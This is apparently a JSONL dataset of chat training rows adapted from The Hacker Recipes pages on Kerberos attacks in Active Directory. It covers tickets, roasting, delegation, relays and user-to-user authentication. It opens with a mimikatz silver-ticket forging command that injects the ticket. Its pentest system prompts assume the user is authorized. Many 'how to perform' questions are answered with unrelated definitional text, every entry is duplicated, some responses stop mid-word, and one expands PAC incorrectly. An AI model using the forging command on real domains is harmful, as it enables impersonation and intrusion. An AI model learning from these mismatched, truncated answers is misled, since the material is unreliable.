testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute with an AES 256 key?", "response": "kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$serviceAccount_aes256_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt\n``\n\nFor both mimikatz and Rubeus, the /ptt` flag is used to automatically inject the ticket.\n\n:::\n\n> [!SUCCESS]\n> A great, stealthier, alternative to silver ticket is to abuse S4U2self in order to impersonate a domain user with local admin privileges on the target machine by relying on Kerberos delegation instead of forging everything.", "metadata": {"corpus_index": 625, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/silver.md", "page_title": "Silver tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Kerberos?"}, {"role": "assistant", "content": "A Kerberos realm is a logical group of networked computers that share a common authentication database. The authentication database is used to store the Kerberos tickets that are issued to users and services when they authenticate to the network.\n\nIn a Kerberos environment, each networked computer is a member of a realm. The realm is responsible for authenticating users and services and for issuing and managing Kerberos tickets.\n\nA Kerberos realm can be implemented on any type of network, including networks that are not running Windows. In fact, the Kerberos protocol was developed as an open standard and is used by many different types of operating systems and networks.\n\nOn a Windows network, a Kerberos realm is typically equivalent to a domain. Each domain in a Windows network is a member of a realm, and the domain controller is responsible for authenticating users and services and for issuing and managing Kerberos tickets.\n\nHowever, on a non-Windows network, a Kerberos realm can be implemented independently of any domain structure. In this case, the Kerberos server is responsible for authenticating users and services and for issuing and managing Kerberos tickets.\n\nThe Hacker Recipes mainly covers Kerberos attacks in a Windows context, but some attacks can also be conducted in non-Windows networks.\n\n![](<../assets/Pass the things (dark).png>)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Kerberos?", "response": "A Kerberos realm is a logical group of networked computers that share a common authentication database. The authentication database is used to store the Kerberos tickets that are issued to users and services when they authenticate to the network.\n\nIn a Kerberos environment, each networked computer is a member of a realm. The realm is responsible for authenticating users and services and for issuing and managing Kerberos tickets.\n\nA Kerberos realm can be implemented on any type of network, including networks that are not running Windows. In fact, the Kerberos protocol was developed as an open standard and is used by many different types of operating systems and networks.\n\nOn a Windows network, a Kerberos realm is typically equivalent to a domain. Each domain in a Windows network is a member of a realm, and the domain controller is responsible for authenticating users and services and for issuing and managing Kerberos tickets.\n\nHowever, on a non-Windows network, a Kerberos realm can be implemented independently of any domain structure. In this case, the Kerberos server is responsible for authenticating users and services and for issuing and managing Kerberos tickets.\n\nThe Hacker Recipes mainly covers Kerberos attacks in a Windows context, but some attacks can also be conducted in non-Windows networks.\n\n![](<../assets/Pass the things (dark).png>)", "metadata": {"corpus_index": 626, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/index.md", "page_title": "Kerberos", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Kerberos during a pentest?"}, {"role": "assistant", "content": "A Kerberos realm is a logical group of networked computers that share a common authentication database. The authentication database is used to store the Kerberos tickets that are issued to users and services when they authenticate to the network.\n\nIn a Kerberos environment, each networked computer is a member of a realm. The realm is responsible for authenticating users and services and for issuing and managing Kerberos tickets.\n\nA Kerberos realm can be implemented on any type of network, including networks that are not running Windows. In fact, the Kerberos protocol was developed as an open standard and is used by many different types of operating systems and networks.\n\nOn a Windows network, a Kerberos realm is typically equivalent to a domain. Each domain in a Windows network is a member of a realm, and the domain controller is responsible for authenticating users and services and for issuing and managing Kerberos tickets.\n\nHowever, on a non-Windows network, a Kerberos realm can be implemented independently of any domain structure. In this case, the Kerberos server is responsible for authenticating users and services and for issuing and managing Kerberos tickets.\n\nThe Hacker Recipes mainly covers Kerberos attacks in a Windows context, but some attacks can also be conducted in non-Windows networks.\n\n![](<../assets/Pass the things (dark).png>)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Kerberos during a pentest?", "response": "A Kerberos realm is a logical group of networked computers that share a common authentication database. The authentication database is used to store the Kerberos tickets that are issued to users and services when they authenticate to the network.\n\nIn a Kerberos environment, each networked computer is a member of a realm. The realm is responsible for authenticating users and services and for issuing and managing Kerberos tickets.\n\nA Kerberos realm can be implemented on any type of network, including networks that are not running Windows. In fact, the Kerberos protocol was developed as an open standard and is used by many different types of operating systems and networks.\n\nOn a Windows network, a Kerberos realm is typically equivalent to a domain. Each domain in a Windows network is a member of a realm, and the domain controller is responsible for authenticating users and services and for issuing and managing Kerberos tickets.\n\nHowever, on a non-Windows network, a Kerberos realm can be implemented independently of any domain structure. In this case, the Kerberos server is responsible for authenticating users and services and for issuing and managing Kerberos tickets.\n\nThe Hacker Recipes mainly covers Kerberos attacks in a Windows context, but some attacks can also be conducted in non-Windows networks.\n\n![](<../assets/Pass the things (dark).png>)", "metadata": {"corpus_index": 626, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/index.md", "page_title": "Kerberos", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Kerberos - Tickets?"}, {"role": "assistant", "content": "Kerberos is an authentication protocol based on tickets. It basically works like this (simplified process):\n\n1. Client asks the KDC (Key Distribution Center, usually is a domain controller) for a TGT (Ticket Granting Ticket). One of the requesting user's keys is used for pre-authentication. The TGT is provided by the Authentication Service (AS). The client request is called AS-REQ, the answer is called AS-REP.\n2. Client uses the TGT to ask the KDC for a ST (Service Ticket). That ticket is provided by the Ticket Granting Service (TGS). The client request is called TGS-REQ, the answer is called TGS-REP.\n3. Client uses the ST (Service Ticket) to access a service. The client request to the service is called AP-REQ, the service answer is called AP-REP.\n4. Both tickets (TGT and ST) usually contain an encrypted PAC (Privilege Authentication Certificate), a set of information that the target service will read to decide if the authentication user can access the service or not (user ID, group memberships and so on).\n\nA Service Ticket (ST) allows access to a specific service. \n\n> [!TIP] cname formats\n> When requesting a service ticket, the client (cname) specifies the service it wants to obtain access to by supplying it's sname, which can be one of 9 types (RFC 4120 section 6.2). Shortly put, the following formats are supported:\n> \n> * servicePrincipalName\n> * userPrincipalName\n> * sAMAccountName\n> * sAMAccountName@DomainNetBIOSName\n> * sAMAccountName@DomainFQDN\n> * DomainNetBIOSName\\sAMAccountName\n> * DomainFQDN\\sAMAccountName\n> \n> > Note that if you use the _SRV01_ string as a sAMAccountName, and the _SRV01_ account does not exist, and the _SRV01$_ account exists, this name will be treated as a principal name of the _SRV01$_ account.\n> >\n> > _(__swarm.ptsecurity.com__)_\n> \n> On a good note, if the service name is specified by something else than an SPN (i.e. SAN, UPN), Kerberos will basically deliver service tickets if the requested service\n> \n> * has a trailing $ in the req"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Kerberos - Tickets?", "response": "Kerberos is an authentication protocol based on tickets. It basically works like this (simplified process):\n\n1. Client asks the KDC (Key Distribution Center, usually is a domain controller) for a TGT (Ticket Granting Ticket). One of the requesting user's keys is used for pre-authentication. The TGT is provided by the Authentication Service (AS). The client request is called AS-REQ, the answer is called AS-REP.\n2. Client uses the TGT to ask the KDC for a ST (Service Ticket). That ticket is provided by the Ticket Granting Service (TGS). The client request is called TGS-REQ, the answer is called TGS-REP.\n3. Client uses the ST (Service Ticket) to access a service. The client request to the service is called AP-REQ, the service answer is called AP-REP.\n4. Both tickets (TGT and ST) usually contain an encrypted PAC (Privilege Authentication Certificate), a set of information that the target service will read to decide if the authentication user can access the service or not (user ID, group memberships and so on).\n\nA Service Ticket (ST) allows access to a specific service. \n\n> [!TIP] cname formats\n> When requesting a service ticket, the client (cname) specifies the service it wants to obtain access to by supplying it's sname, which can be one of 9 types (RFC 4120 section 6.2). Shortly put, the following formats are supported:\n> \n> * servicePrincipalName\n> * userPrincipalName\n> * sAMAccountName\n> * sAMAccountName@DomainNetBIOSName\n> * sAMAccountName@DomainFQDN\n> * DomainNetBIOSName\\sAMAccountName\n> * DomainFQDN\\sAMAccountName\n> \n> > Note that if you use the _SRV01_ string as a sAMAccountName, and the _SRV01_ account does not exist, and the _SRV01$_ account exists, this name will be treated as a principal name of the _SRV01$_ account.\n> >\n> > _(__swarm.ptsecurity.com__)_\n> \n> On a good note, if the service name is specified by something else than an SPN (i.e. SAN, UPN), Kerberos will basically deliver service tickets if the requested service\n> \n> * has a trailing $ in the req", "metadata": {"corpus_index": 627, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/index.md", "page_title": "Kerberos", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Kerberos - Tickets?"}, {"role": "assistant", "content": "Kerberos is an authentication protocol based on tickets. It basically works like this (simplified process):\n\n1. Client asks the KDC (Key Distribution Center, usually is a domain controller) for a TGT (Ticket Granting Ticket). One of the requesting user's keys is used for pre-authentication. The TGT is provided by the Authentication Service (AS). The client request is called AS-REQ, the answer is called AS-REP.\n2. Client uses the TGT to ask the KDC for a ST (Service Ticket). That ticket is provided by the Ticket Granting Service (TGS). The client request is called TGS-REQ, the answer is called TGS-REP.\n3. Client uses the ST (Service Ticket) to access a service. The client request to the service is called AP-REQ, the service answer is called AP-REP.\n4. Both tickets (TGT and ST) usually contain an encrypted PAC (Privilege Authentication Certificate), a set of information that the target service will read to decide if the authentication user can access the service or not (user ID, group memberships and so on).\n\nA Service Ticket (ST) allows access to a specific service. \n\n> [!TIP] cname formats\n> When requesting a service ticket, the client (cname) specifies the service it wants to obtain access to by supplying it's sname, which can be one of 9 types (RFC 4120 section 6.2). Shortly put, the following formats are supported:\n> \n> * servicePrincipalName\n> * userPrincipalName\n> * sAMAccountName\n> * sAMAccountName@DomainNetBIOSName\n> * sAMAccountName@DomainFQDN\n> * DomainNetBIOSName\\sAMAccountName\n> * DomainFQDN\\sAMAccountName\n> \n> > Note that if you use the _SRV01_ string as a sAMAccountName, and the _SRV01_ account does not exist, and the _SRV01$_ account exists, this name will be treated as a principal name of the _SRV01$_ account.\n> >\n> > _(__swarm.ptsecurity.com__)_\n> \n> On a good note, if the service name is specified by something else than an SPN (i.e. SAN, UPN), Kerberos will basically deliver service tickets if the requested service\n> \n> * has a trailing $ in the req"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Kerberos - Tickets?", "response": "Kerberos is an authentication protocol based on tickets. It basically works like this (simplified process):\n\n1. Client asks the KDC (Key Distribution Center, usually is a domain controller) for a TGT (Ticket Granting Ticket). One of the requesting user's keys is used for pre-authentication. The TGT is provided by the Authentication Service (AS). The client request is called AS-REQ, the answer is called AS-REP.\n2. Client uses the TGT to ask the KDC for a ST (Service Ticket). That ticket is provided by the Ticket Granting Service (TGS). The client request is called TGS-REQ, the answer is called TGS-REP.\n3. Client uses the ST (Service Ticket) to access a service. The client request to the service is called AP-REQ, the service answer is called AP-REP.\n4. Both tickets (TGT and ST) usually contain an encrypted PAC (Privilege Authentication Certificate), a set of information that the target service will read to decide if the authentication user can access the service or not (user ID, group memberships and so on).\n\nA Service Ticket (ST) allows access to a specific service. \n\n> [!TIP] cname formats\n> When requesting a service ticket, the client (cname) specifies the service it wants to obtain access to by supplying it's sname, which can be one of 9 types (RFC 4120 section 6.2). Shortly put, the following formats are supported:\n> \n> * servicePrincipalName\n> * userPrincipalName\n> * sAMAccountName\n> * sAMAccountName@DomainNetBIOSName\n> * sAMAccountName@DomainFQDN\n> * DomainNetBIOSName\\sAMAccountName\n> * DomainFQDN\\sAMAccountName\n> \n> > Note that if you use the _SRV01_ string as a sAMAccountName, and the _SRV01_ account does not exist, and the _SRV01$_ account exists, this name will be treated as a principal name of the _SRV01$_ account.\n> >\n> > _(__swarm.ptsecurity.com__)_\n> \n> On a good note, if the service name is specified by something else than an SPN (i.e. SAN, UPN), Kerberos will basically deliver service tickets if the requested service\n> \n> * has a trailing $ in the req", "metadata": {"corpus_index": 627, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/index.md", "page_title": "Kerberos", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Kerberos - Roasting in the context of penetration testing"}, {"role": "assistant", "content": "If Kerberos preauthentication is disabled for a user, it is possible to request a TGT for that specific user without knowing any credentials. When the TGT is requested, the KDC sends it along with a session key in the KRB_AS_REP message to the requesting client. The session key being encrypted with the requested user's NT hash, it is possible to crack that session key offline in a an attempt to find the user's password. This is called ASREProasting.\n\nIf an attacker finds himself in a man-in-the-middle position, effectively capturing Kerberos messages, he could capture KRB_AS_REQ messages and operate a similar cracking attempt.\n\n> [!TIP]\n> Read the Asreqroast article for more insight\n \n\nWhen attackers have a foothold in the domain (i.e. valid domain credentials), they have the (intended) ability to request a service ticket (ST) for any valid SPN (ServicePrincipalName), or SAN (samAccountName). The ST being encrypted with the service account's NT hash, when that service account's password is weak, it is then possible to crack the ST offline in an attempt to find the password. This is called Kerberoasting. On a side note, obtaining a service ticket for a service specified by its SAN in an attempt to Kerberoast the account will only work if the service has at least one SPN.\n\nAs it turns out, AS-REQ messages can not only be used to request TGTs but can be invoked to ask for Service Tickets as well. One of the consequences of this is that Kerberoast can be conducted without prior foothold to the domain if the attacker knows the service to target (its SPN or name) as well as an ASREProastable username: Kerberoasting without pre-authentication."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Kerberos - Roasting in the context of penetration testing", "response": "If Kerberos preauthentication is disabled for a user, it is possible to request a TGT for that specific user without knowing any credentials. When the TGT is requested, the KDC sends it along with a session key in the KRB_AS_REP message to the requesting client. The session key being encrypted with the requested user's NT hash, it is possible to crack that session key offline in a an attempt to find the user's password. This is called ASREProasting.\n\nIf an attacker finds himself in a man-in-the-middle position, effectively capturing Kerberos messages, he could capture KRB_AS_REQ messages and operate a similar cracking attempt.\n\n> [!TIP]\n> Read the Asreqroast article for more insight\n \n\nWhen attackers have a foothold in the domain (i.e. valid domain credentials), they have the (intended) ability to request a service ticket (ST) for any valid SPN (ServicePrincipalName), or SAN (samAccountName). The ST being encrypted with the service account's NT hash, when that service account's password is weak, it is then possible to crack the ST offline in an attempt to find the password. This is called Kerberoasting. On a side note, obtaining a service ticket for a service specified by its SAN in an attempt to Kerberoast the account will only work if the service has at least one SPN.\n\nAs it turns out, AS-REQ messages can not only be used to request TGTs but can be invoked to ask for Service Tickets as well. One of the consequences of this is that Kerberoast can be conducted without prior foothold to the domain if the attacker knows the service to target (its SPN or name) as well as an ASREProastable username: Kerberoasting without pre-authentication.", "metadata": {"corpus_index": 628, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/index.md", "page_title": "Kerberos", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Kerberos - Roasting?"}, {"role": "assistant", "content": "If Kerberos preauthentication is disabled for a user, it is possible to request a TGT for that specific user without knowing any credentials. When the TGT is requested, the KDC sends it along with a session key in the KRB_AS_REP message to the requesting client. The session key being encrypted with the requested user's NT hash, it is possible to crack that session key offline in a an attempt to find the user's password. This is called ASREProasting.\n\nIf an attacker finds himself in a man-in-the-middle position, effectively capturing Kerberos messages, he could capture KRB_AS_REQ messages and operate a similar cracking attempt.\n\n> [!TIP]\n> Read the Asreqroast article for more insight\n \n\nWhen attackers have a foothold in the domain (i.e. valid domain credentials), they have the (intended) ability to request a service ticket (ST) for any valid SPN (ServicePrincipalName), or SAN (samAccountName). The ST being encrypted with the service account's NT hash, when that service account's password is weak, it is then possible to crack the ST offline in an attempt to find the password. This is called Kerberoasting. On a side note, obtaining a service ticket for a service specified by its SAN in an attempt to Kerberoast the account will only work if the service has at least one SPN.\n\nAs it turns out, AS-REQ messages can not only be used to request TGTs but can be invoked to ask for Service Tickets as well. One of the consequences of this is that Kerberoast can be conducted without prior foothold to the domain if the attacker knows the service to target (its SPN or name) as well as an ASREProastable username: Kerberoasting without pre-authentication."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Kerberos - Roasting?", "response": "If Kerberos preauthentication is disabled for a user, it is possible to request a TGT for that specific user without knowing any credentials. When the TGT is requested, the KDC sends it along with a session key in the KRB_AS_REP message to the requesting client. The session key being encrypted with the requested user's NT hash, it is possible to crack that session key offline in a an attempt to find the user's password. This is called ASREProasting.\n\nIf an attacker finds himself in a man-in-the-middle position, effectively capturing Kerberos messages, he could capture KRB_AS_REQ messages and operate a similar cracking attempt.\n\n> [!TIP]\n> Read the Asreqroast article for more insight\n \n\nWhen attackers have a foothold in the domain (i.e. valid domain credentials), they have the (intended) ability to request a service ticket (ST) for any valid SPN (ServicePrincipalName), or SAN (samAccountName). The ST being encrypted with the service account's NT hash, when that service account's password is weak, it is then possible to crack the ST offline in an attempt to find the password. This is called Kerberoasting. On a side note, obtaining a service ticket for a service specified by its SAN in an attempt to Kerberoast the account will only work if the service has at least one SPN.\n\nAs it turns out, AS-REQ messages can not only be used to request TGTs but can be invoked to ask for Service Tickets as well. One of the consequences of this is that Kerberoast can be conducted without prior foothold to the domain if the attacker knows the service to target (its SPN or name) as well as an ASREProastable username: Kerberoasting without pre-authentication.", "metadata": {"corpus_index": 628, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/index.md", "page_title": "Kerberos", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Kerberos - Delegations?"}, {"role": "assistant", "content": "Kerberos delegations allow services to access other services on behalf of domain users. For instance, this allows services to require access to other services' data on the authenticated user's behalf in order to pull data that only the said user is supposed to have access to.\n\nIn some situations, Kerberos delegations can be abused by attackers to operate lateral movement or privilege escalation.\n\n> [!TIP]\n> Read the Delegations article for more insight\n\nIn some cases, the delegation will not work. Depending on the context, the bronze bit vulnerability (CVE-2020-17049) can be used to try to bypass restrictions.\n\n> [!TIP]\n> Read the Bronze bit article for more insight"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Kerberos - Delegations?", "response": "Kerberos delegations allow services to access other services on behalf of domain users. For instance, this allows services to require access to other services' data on the authenticated user's behalf in order to pull data that only the said user is supposed to have access to.\n\nIn some situations, Kerberos delegations can be abused by attackers to operate lateral movement or privilege escalation.\n\n> [!TIP]\n> Read the Delegations article for more insight\n\nIn some cases, the delegation will not work. Depending on the context, the bronze bit vulnerability (CVE-2020-17049) can be used to try to bypass restrictions.\n\n> [!TIP]\n> Read the Bronze bit article for more insight", "metadata": {"corpus_index": 629, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/index.md", "page_title": "Kerberos", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Kerberos - Delegations"}, {"role": "assistant", "content": "Kerberos delegations allow services to access other services on behalf of domain users. For instance, this allows services to require access to other services' data on the authenticated user's behalf in order to pull data that only the said user is supposed to have access to.\n\nIn some situations, Kerberos delegations can be abused by attackers to operate lateral movement or privilege escalation.\n\n> [!TIP]\n> Read the Delegations article for more insight\n\nIn some cases, the delegation will not work. Depending on the context, the bronze bit vulnerability (CVE-2020-17049) can be used to try to bypass restrictions.\n\n> [!TIP]\n> Read the Bronze bit article for more insight"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Kerberos - Delegations", "response": "Kerberos delegations allow services to access other services on behalf of domain users. For instance, this allows services to require access to other services' data on the authenticated user's behalf in order to pull data that only the said user is supposed to have access to.\n\nIn some situations, Kerberos delegations can be abused by attackers to operate lateral movement or privilege escalation.\n\n> [!TIP]\n> Read the Delegations article for more insight\n\nIn some cases, the delegation will not work. Depending on the context, the bronze bit vulnerability (CVE-2020-17049) can be used to try to bypass restrictions.\n\n> [!TIP]\n> Read the Bronze bit article for more insight", "metadata": {"corpus_index": 629, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/index.md", "page_title": "Kerberos", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Kerberos - Relays"}, {"role": "assistant", "content": "Like NTLM, the Kerberos protocol is also prone to authentication relay attacks.\n\n> [!TIP]\n> Read the Relay article for more insight"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Kerberos - Relays", "response": "Like NTLM, the Kerberos protocol is also prone to authentication relay attacks.\n\n> [!TIP]\n> Read the Relay article for more insight", "metadata": {"corpus_index": 630, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/index.md", "page_title": "Kerberos", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Kerberos - Relays?"}, {"role": "assistant", "content": "Like NTLM, the Kerberos protocol is also prone to authentication relay attacks.\n\n> [!TIP]\n> Read the Relay article for more insight"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Kerberos - Relays?", "response": "Like NTLM, the Kerberos protocol is also prone to authentication relay attacks.\n\n> [!TIP]\n> Read the Relay article for more insight", "metadata": {"corpus_index": 630, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/index.md", "page_title": "Kerberos", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Kerberos - User-to-User authentication"}, {"role": "assistant", "content": "U2U has nothing to do with S4U mechanisms and plays no part in delegation internals.\n\n> \\[U2U] allows users to host secure application services on their desktop machines. \\[...] In the user-to-user protocol, one user acts as a server, and the other user acts as a client. (Frequently Asked Questions about Kerberos).\n\n::: details More technical notes\nA U2U request is a variation of a common Service Ticket request (KRB_TGS_REQ). Below is what differentiates a U2U from a standard KRB_TGS_REQ. It allows a user to request a service ticket to another user.\n\n* Request contains an additional-tickets field containing the target user TGT.\n* Request contains the ENC-TKT-IN-SKEY flag in the kdc-options field, indicating that the ticket for the end server is to be encrypted in the session key from the additional TGT provided (doc).\n* The sname refers to a UPN (User Principal Name) of an account that doesn't necessarily have to have an SPN set.\n\nA ticket produced with u2u is encrypted with the session key of the TGT included as additional-ticket instead of the target service long-term key (i.e. DES, RC4 or AES128/256 key).\n:::\n\n::: details S4U2self + U2U\nIn some specific scenarios, S4U2self and U2U can be combined, in which case the flags and structures both mechanisms include in their requests are combined.\n\nThis allows to\n\n* operate RBCD attacks from SPN-less accounts\n* operate an unPAC-the-hash attack\n* retrieve and decrypt the PAC (Privileged Attribute Certificate) of any account. Could be used to obtain a sapphire ticket.\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Kerberos - User-to-User authentication", "response": "U2U has nothing to do with S4U mechanisms and plays no part in delegation internals.\n\n> \\[U2U] allows users to host secure application services on their desktop machines. \\[...] In the user-to-user protocol, one user acts as a server, and the other user acts as a client. (Frequently Asked Questions about Kerberos).\n\n::: details More technical notes\nA U2U request is a variation of a common Service Ticket request (KRB_TGS_REQ). Below is what differentiates a U2U from a standard KRB_TGS_REQ. It allows a user to request a service ticket to another user.\n\n* Request contains an additional-tickets field containing the target user TGT.\n* Request contains the ENC-TKT-IN-SKEY flag in the kdc-options field, indicating that the ticket for the end server is to be encrypted in the session key from the additional TGT provided (doc).\n* The sname refers to a UPN (User Principal Name) of an account that doesn't necessarily have to have an SPN set.\n\nA ticket produced with u2u is encrypted with the session key of the TGT included as additional-ticket instead of the target service long-term key (i.e. DES, RC4 or AES128/256 key).\n:::\n\n::: details S4U2self + U2U\nIn some specific scenarios, S4U2self and U2U can be combined, in which case the flags and structures both mechanisms include in their requests are combined.\n\nThis allows to\n\n* operate RBCD attacks from SPN-less accounts\n* operate an unPAC-the-hash attack\n* retrieve and decrypt the PAC (Privileged Attribute Certificate) of any account. Could be used to obtain a sapphire ticket.\n:::", "metadata": {"corpus_index": 631, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/index.md", "page_title": "Kerberos", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Kerberos - User-to-User authentication?"}, {"role": "assistant", "content": "U2U has nothing to do with S4U mechanisms and plays no part in delegation internals.\n\n> \\[U2U] allows users to host secure application services on their desktop machines. \\[...] In the user-to-user protocol, one user acts as a server, and the other user acts as a client. (Frequently Asked Questions about Kerberos).\n\n::: details More technical notes\nA U2U request is a variation of a common Service Ticket request (KRB_TGS_REQ). Below is what differentiates a U2U from a standard KRB_TGS_REQ. It allows a user to request a service ticket to another user.\n\n* Request contains an additional-tickets field containing the target user TGT.\n* Request contains the ENC-TKT-IN-SKEY flag in the kdc-options field, indicating that the ticket for the end server is to be encrypted in the session key from the additional TGT provided (doc).\n* The sname refers to a UPN (User Principal Name) of an account that doesn't necessarily have to have an SPN set.\n\nA ticket produced with u2u is encrypted with the session key of the TGT included as additional-ticket instead of the target service long-term key (i.e. DES, RC4 or AES128/256 key).\n:::\n\n::: details S4U2self + U2U\nIn some specific scenarios, S4U2self and U2U can be combined, in which case the flags and structures both mechanisms include in their requests are combined.\n\nThis allows to\n\n* operate RBCD attacks from SPN-less accounts\n* operate an unPAC-the-hash attack\n* retrieve and decrypt the PAC (Privileged Attribute Certificate) of any account. Could be used to obtain a sapphire ticket.\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Kerberos - User-to-User authentication?", "response": "U2U has nothing to do with S4U mechanisms and plays no part in delegation internals.\n\n> \\[U2U] allows users to host secure application services on their desktop machines. \\[...] In the user-to-user protocol, one user acts as a server, and the other user acts as a client. (Frequently Asked Questions about Kerberos).\n\n::: details More technical notes\nA U2U request is a variation of a common Service Ticket request (KRB_TGS_REQ). Below is what differentiates a U2U from a standard KRB_TGS_REQ. It allows a user to request a service ticket to another user.\n\n* Request contains an additional-tickets field containing the target user TGT.\n* Request contains the ENC-TKT-IN-SKEY flag in the kdc-options field, indicating that the ticket for the end server is to be encrypted in the session key from the additional TGT provided (doc).\n* The sname refers to a UPN (User Principal Name) of an account that doesn't necessarily have to have an SPN set.\n\nA ticket produced with u2u is encrypted with the session key of the TGT included as additional-ticket instead of the target service long-term key (i.e. DES, RC4 or AES128/256 key).\n:::\n\n::: details S4U2self + U2U\nIn some specific scenarios, S4U2self and U2U can be combined, in which case the flags and structures both mechanisms include in their requests are combined.\n\nThis allows to\n\n* operate RBCD attacks from SPN-less accounts\n* operate an unPAC-the-hash attack\n* retrieve and decrypt the PAC (Privileged Attribute Certificate) of any account. Could be used to obtain a sapphire ticket.\n:::", "metadata": {"corpus_index": 631, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/index.md", "page_title": "Kerberos", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", 